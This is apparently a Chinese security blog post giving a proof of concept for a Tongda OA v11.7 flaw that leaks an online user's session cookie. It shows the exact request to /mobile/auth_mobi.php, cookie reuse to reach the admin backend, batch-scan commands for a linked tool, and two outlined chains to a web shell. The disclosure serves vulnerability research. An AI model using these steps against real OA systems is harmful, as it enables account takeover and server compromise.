

S1xHcL's Blog.

通达OA v11.7 在线用户登录漏洞

S1xHcL's Blog.

通达OA v11.7 在线用户登录漏洞

Tools POC OA

Word count: 316Reading time: 1 min

 2021/03/13   Share

• 
• 
• 
• 
• 

漏洞简述

通达OA v11.7 中存在某接口查询在线用户，当用户在线时会返回 PHPSESSION使其可登录后台系统

影响版本

通达OA < v11.7

漏洞利用

检测当前用户是否存在线

http://127.0.0.1/mobile/auth_mobi.php?isAvatar=1&uid=1&P_VER=0

不在线

不在线显示 RELOGIN

在线

在线页面空白，但已拿到SESSION

设置Cookie可直接登录后台

http://127.0.0.1/general/index.php

工具利用

https://github.com/S1xHcL/TongDa_Scan

# 指定 URL
python3 .\TongDa_Scan.py -u 127.0.0.1

# 指定 uid 进行扫描
python3 .\TongDa_Scan.py -u 127.0.0.1 -i 1

# 批量扫描，默认扫描UID为1
python3 .\TongDa_Scan.py -f ./list.txt

待更新

1. 多线程，加快扫描速度
2. 自动getshell

方法一

任意用户登录 -> 低权限文件上传 -> 目录穿越 -> 任意文件包含 -> getshell

通达OA代码审计篇 - 11.7 有条件的任意命令执行

方法二

任意用户登录 -> 获取安装目录 -> 任意文件读取(redis账号密码) -> ssrf写文件 -> getshell

通达OA11.7 利用新思路（附EXP）

引用

通达OA v11.7 在线用户登录漏洞 · PeiQi WiKi文库

Author：S1xHcL

原文链接：https://s1xhcl.github.io/2021/03/13/%E9%80%9A%E8%BE%BEOA-v11-7-%E5%9C%A8%E7%BA%BF%E7%94%A8%E6%88%B7%E7%99%BB%E5%BD%95%E6%BC%8F%E6%B4%9E/

发表日期：March 13th 2021, 3:10:30 pm

更新日期：March 13th 2021, 3:57:35 pm

版权声明：本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  对某棋牌站的一次getshell
• Previous Post
  CNVD-2021-14536-POC

Powered by Hexotheme Archer

PV: :)

CATALOG

1. 1. 漏洞简述
2. 2. 影响版本
3. 3. 漏洞利用
4. 4. 工具利用
5. 5. 待更新
   1. 5.1. 方法一
   2. 5.2. 方法二
6. 6. 引用



• Archive
• Tag
• Cate

Total : 46

2024

• 06/02ThinkPHP 命令执行代码审计学习

2023

• 03/16Nacos 身份认证绕过漏洞复现
• 02/07PHPYun代码审计

2022

• 12/29ThinkPHP 代码审计学习记录
• 12/29ThinkPHP 代码审计学习记录
• 12/16yakit之编写poc
• 10/18CNVD-2022-42853-漏洞分析
• 10/18PHP-Audit Day12 误用htmlentities函数引发的漏洞
• 10/11PHP-Audit Day11 unserialize反序列化漏洞
• 04/30Apache Struts漏洞分析学习-S2-062
• 04/10PHP-Audit Day10 程序未恰当exit导致的问题
• 04/03PHP-Audit-Day09-str-replace-函数过滤不当

2021

• 11/01查找 spring heapdump 中的密码明文
• 10/22Pentest-tips 收集
• 10/16PHP-Audit Day08 preg_replace函数之命令执行
• 10/14PHP-Audit Day07 parse_str函数缺陷
• 10/12PHP-Audit Day06 正则使用不当导致的路径穿越问题
• 10/10PHP-Audit Day05 escapeshellarg与escapeshellcmd使用不当
• 10/06PHP-Audit Day04 strpos使用不当引发漏洞
• 10/03PHP-Audit Day03 实例化任意对象漏洞
• 10/02PHP-Audit Day02 filter_var()函数缺陷
• 10/01PHP-Audit Day01 in_array()函数缺陷
• 09/20某平台渗透测试记录
• 08/30bluecms-代码审计学习
• 08/12sql注入-安全狗绕过
• 04/24Interview4
• 04/23Windows认证-Kerberos
• 04/082021-HW
• 04/06Windows认证机制学习
• 04/01一次简单的杀猪盘getshell
• 03/27Interview3.md
• 03/27CVE-2021-22986-POC
• 03/24国内某系统任意文件读取漏洞
• 03/17对某棋牌站的一次getshell
• 03/13通达OA v11.7 在线用户登录漏洞
• 03/08CNVD-2021-14536-POC
• 03/06php_bugs
• 03/02Interview2
• 02/22C_Notes
• 02/09CVE-2020-17518/17519复现
• 02/03对某BC站的一次不完整渗透
• 02/02常见CMS后台收集
• 02/01sqlmap 基本用法
• 01/31InterView

2019

• 09/09CVE-2019-0708 复现
• 09/08Hello World

HW CVE Tools learn Struts Python Windows code InterView Learn PHP Audit Pentest ThinkPHP RCE Sql Windows认证 Kerberos sqlmap sql POC Work OA



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

POC CVE Audit CVE/EXP CVE/POC C Audit/Java learn Audit/PHP Vul Tips 内网学习 tools bypass POC/YAKIT Pentest 0Day mark

